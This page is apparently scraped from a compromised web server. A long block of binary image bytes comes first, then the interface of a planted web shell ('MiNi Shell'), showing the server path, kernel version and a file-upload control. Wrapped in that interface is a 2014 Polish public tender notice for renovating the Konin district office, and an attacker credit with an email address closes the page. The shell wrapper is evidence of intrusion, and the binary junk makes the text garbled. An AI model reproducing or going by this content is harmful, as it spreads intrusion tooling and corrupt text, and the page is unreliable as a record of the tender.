JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/126291-N-2014.html

<p class="kh_header"><b>Konin: Remont pomieszczeń w budynku Starostwa Powiatowego w Koninie, Al. 1 Maja 9, oraz remont łącznika</b><br>
<b>Numer ogłoszenia: 126291 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koniński - Starostwo Powiatowe w Koninie , Al. 1 Maja  9, 62-510 Konin, woj. wielkopolskie, tel. 63 240 32 12, faks 63 240 32 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w budynku Starostwa Powiatowego w Koninie, Al. 1 Maja 9, oraz remont łącznika.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1. Remont pomieszczenia kierowców - piwnica:
a) podłoga - usunięcie wykładziny, impregnacja podłoża. nowa wykładzina heterogeniczne panele winylowe (tarket) klasa ścieralności en 649, grupa t, odporna na fotele na kółkach. antypoślizgowa  R10 DS, gwarancja 10lat,
b) ściany - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności ścian, malowanie - farba lateksowa, wysoka odporność na zmywanie i szorowanie na mokro - klasa II, np.: firmy Tikkurila
c) sufit - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności  sufitu, malowanie farba lateksowa,wysoka odporność na zmywanie i szorowanie na mokro-klasa II, np.: firmy Tikkurila
d) okna wyposażyć w nawiewnik higrosterowany, dwustrumieniowy np.: firmy aereco - zapewnienie  prawidłowej wentylacji
e) kolorystyka pomieszczeń - ściany wg kolornika NCS S 0500-n, S 1000-n, sufit biały;
f) wymiana pionu kanalizacyjnego oraz jego budowanie systemowo GK;
g) wyłożenie płytkami ceramicznymi miejsca pod umywalkę.
h) wymiana instalacji elektrycznej ( wymiana punków oraz okablowania podtynkowego.
2. Remont łącznika przy budynku Starostwa:
2.1. Łącznik dach
W związku z uszkodzeniem połączenia (wadliwie wykonanego podczas ostatniego remontu) pomiędzy połacią dachu łącznika a ścianą budynku projektuje się wykonie nowego połączenia w/welementów.
a) wzdłuż całego połączenia dachu ze ścianą należy wykonać połączenie wg rysunku detalu w/w połączenia
b) w miejscu podłączenia instalacji klimatyzacji należy starannie zabezpieczyć miejsce połączenia i uszczelnić je folią w płynie lub sylikonem
c) Pozostałe prace zgodnie z rys. technicznym.
2.2. Łącznik wewnątrz
W wyniku przeciekania dachu zniszczeniu uległa część ściany będąca wypełnieniem konstrukcji stalowej łącznika oraz na połączeniu sufitu ze ścianą.
Należy wykonać następujące prace remontowe:
a) całe wypełnienie konstrukcji stalowej należy zdemontować - powierzchnię osuszyć, zaimpregnować ;
b) konstrukcję metalową zabezpieczyć antykorozyjnie;
c) przestrzeń wypełnić płytami gipsowymi wodoodpornymi, wygipsować (gładź gipsowa) i pomalować;
d) naprawić cokoły ceramiczne przy drzwiach i fasadzie;
e) na łączeniu fasady murem zamontować listwę dylatacyjną;
f) ściany - oczyszczenie, impregnacja, malowanie - farba lateksowa, wysoka odporność na zmywanie i szorowanie na mokro - klasa II, np.: firmy Tikkurila
g) sufit - oczyszczenie, impregnacja, malowanie farba lateksowa, wysoka odporność na zmywanie  i szorowanie na mokro - klasa ii, np.: firmy Tikkurila
h) kolorystyka pomieszczania - ściany wg kolornika NCS S 0500-n, S 1000-n, sufit biały.
2.3. Remont pomieszczenia 155:
a) podłoga - usunięcie wykładziny, impregnacja podłoża. Wykonanie wylewki betonowej, nowa  wykładzina heterogeniczne panele winylowe (tarket lub expona) klasa ścieralności en 649, grupa t,odporna na fotele na kółkach. antypoślizgowa R10 DS, gwarancja 10lat, Wykładzinę podłogową należy wywinąć na ścianę na wysokości 10cm - technologia zgodna z zaleceniami producenta
    wykładziny
b) ściany - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności ścian, malowanie - farba lateksowa, wysoka odporność na zmywanie i szorowanie na mokro -  klasa II, np.: firmy Tikkurila
c) sufit - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności sufitu,malowanie farba lateksowa,wysoka odporność na zmywanie i szorowanie na mokro-klasa II, np.: firmy Tikkurila
d) parapety istniejące usunąć - nowy parapet z konglomeratu lub kamienia
e) okna wyposażyć w nawiewnik higrosterowany, dwustrumieniowy np.: firmy aereco - zapewnienie prawidłowej wentylacji
f)  kolorystyka pomieszczeń - ściany wg kolornika NCS S 0500-n, S 1000-n, sufit biały.
g) drzwi do zaplecza do wymiany - nowe drzwi wewnętrzne płytowe HDF, ościeżnica drewniana regulowana kolor identyczny z wejściowymi.
h) lampy - na suficie należy wymienić i rozmieścić lampy zgodnie z projektem ich rozmieszczenia,
i) wymiana instalacji elektrycznej - wymiana punków oraz okablowania podtynkowego,
j) lokalizacja elementów instalacji elektrycznej tj. gniazda oraz włączniki wymaga uzgodnienia z głównym projektantem.
2.4. Remont pomieszczenia 157
a) podłoga - usunięcie wykładziny oraz parkietu wraz z podłożem, impregnacja podłoża. Wykonanie wylewki betonowej, nowa wykładzina heterogeniczne panele winylowe (tarket lub expona) klasa ścieralności en 649, grupa t, odporna na fotele na kółkach. antypoślizgowa R10 DS, gwarancja10lat, Wykładzinę podłogową należy wywinąć na ścianę na wysokości 10cm - technologia zgodna z zaleceniami producenta wykładziny,
b) ściana - miejsce zawilgocenia, przed przystąpieniem należy zlikwidować źródło zacieku!!!, tynk zawilgocony osuszyć na następnie skuć w całości, ścianę zaimpregnować i nałożyć nowy tynk  cementowo wapienny,
c) ściany - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności  ścian, malowanie - farba lateksowa, wysoka odporność na zmywanie i szorowanie na mokro -  klasa II, np.: firmy Tikkurila
d) sufit - oczyszczenie, impregnacja, wykonanie gładzi gipsowej w celu wyrównania nierówności  sufitu,malowanie farba lateksowa,wysoka odporność na zmywanie i szorowanie na mokro -klasa II, np.: firmy Tikkurila
e) parapety istniejące usunąć - nowy parapet z konglomeratu lub kamienia
f)  okna wyposażyć w nawiewnik higrosterowany, dwustrumieniowy np.: firmy aereco - zapewnienie prawidłowej wentylacji
g) kolorystyka pomieszczeń - ściany wg kolornika NCS S 0500-n, S 1000-n, sufit - biały
h) wymiana instalacji elektrycznej - wymiana punków oraz okablowania podtynkowego,
i)  lokalizacja elementów instalacji elektrycznej tj. gniazda oraz włączniki wymaga uzgodnienia  z głównym projektantem.

2.5. Remont pomieszczenia wc (wg dokumentacji projektowej).
a) PODŁOGA - usunięcie istniejących posadzki, impregnacja podłoża. nowe płytki gresowe,
b) ŚCIANY - usuniecie z niewyburzanych ścian płytek ceramicznych - wyrównanie ścian i ich
    impregnacja, nowe płytki ceramiczne lub gresowe do wysokości min 2.0m. pozostała część
    wykończona gładzią gipsową i malowana farbami lateksowymi do stosowania w pomieszczeniach    
    mokrych - wysoka odporność na zmywanie i szorowanie na mokro - klasa II,
c) SUFIT - usunięcie istniejącego sufitu podwieszanego kasetonowego - montaż nowego sufitu
    kasetonowego lub systemowego GK;
d) grzejniki - pomieszczenia wyposażyć w grzejniki zgodnie z rysunkiem;
e) okno wyposażyć w nawiewnik HIGROSTEROWANY, DWUSTRUMIENIOWY np.: firmy AERECO -
    zapewnienie prawidłowej wentylacji
f) KOLORYSTYKA POMIESZCZEŃ - ŚCIANY wg kolornika NCS S 0500-N, S 1000-N, SUFIT biały;
g) DRZWI DO pomieszczeń - nowe drzwi wewnętrzne płytowe HDF, ościeżnica drewniana
    regulowana kolor identyczny z istniejącymi drzwiami na korytarzu obiektu, drzwi przy klatce
    schodowej do wc męskiego przesuwne;
h) instalacja elektryczna - należy wykonać nową instalacje elektryczną;
i)  instalacja sanitarna - należy całkowicie wykonać ja na nowy elementach - należy również wymienić    
    istniejące piony kanalizacyjne na nowe wykonane z rur PCV;
j) instalacja c.o. - należy wykonać zgodnie z projektem ( rury oraz grzejniki nowe);
k) wybór rodzaju płytek ceramicznych lub gresowych w uzgodnieniu z inwestorem,proponowane 
    płytki: podłogowe - gresowe, gres nieszkliwiony o wymiarach 40x40cm - specyfikacja płytki nie |    
    gorsza niż płytki (Nowa Gala - CONCEPT), płytki ścienne gresowe, gres nieszkliwiony o wymiarach 
   60x30cm - specyfikacja płytki nie gorsza niż płytki (Nowa Gala - CONCEPT);
l) urządzenia WC - typu kompakt przykryte obudową o wysokości dopasowanej do ułożenia  płytek 
   ściennych - h=120.0-130.0cm;
m) urządzenia dla osób niepełnosprawnych z poręczami;
n) Urządzenia WC - zgodne ze specyfikacją firmy KOŁO - seria NOVA PRO - można użyć
    zamienników innych firm, ale nie gorszej jakości - warunkiem zmiany jest zgoda projektanta
    oraz inwestora;
o) Wykaz urządzeń wyposażenia sanitarnego:
    - dozownik do mydła w płynie po 1szt. na każdą umywalkę;
    - suszarka do rąk - po 1szt. na każde pomieszczenie;
    - pojemnik na papier toaletowy - po 1szt. na każdą miskę ustępową;
    - szczotka do toalety po 1szt. na każdą miskę ustępową;
    - kosz stalowy na odpady - 1szt. do pomieszczenia wc męskiego;
    - kosz do damskich toalet - 1szt. do pomieszczenia wc damskiego;
   Urządzenia wyposażenia sanitarnego przyjęto, jako stalowe ze stali matowej wg specyfikacji firmy  Merida - można użyć zamienników innych firm, ale nie gorszej jakości - warunkiem zmiany jest  zgoda projektanta oraz inwestora.
p) lokalizacja elementów instalacji elektrycznej tj. gniazda oraz włączniki wymaga uzgodnienia  z głównym projektantem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.00.00-1, 45.42.11.41-4, 45.41.00.00-1, 45.44.21.00-8, 45.43.12.00-9, 45.43.21.11-5, 45.33.20.00-3, 45.31.00.00-3, 45.33.12.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wniesienia wadium w wysokości 20.000 zł (dwadzieściatysięcyzłotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży stosowne oświadczenie, iż posiada on uprawnienia do wykonywania określonej działalności lub czynności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwa zadania obejmujące remonty pomieszczeń o wartości łącznej tych dwóch zamówień nie  
    mniejsze j niż 250.000,00zł (brutto). Powyższe Wykonawca musi wykazać w formie załączonego do oferty wykazu robót wraz z załączeniem dowodów określających czy najważniejsze roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży stosowne oświadczenie, iż dysponuje on odpowiednim potencjałem technicznym zdolnym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży stosowne oświadczenie, iż dysponuje on  osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży stosowne oświadczenie, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Koninie
Aleje 1 Maja 9
62-510 Konin
pok. 363.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2014 godzina 11:00, miejsce: Starostwo Powiatowe w Koninie
Aleje 1 Maja 9
62-510 Konin
pok. 168 (KANCELARIA).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com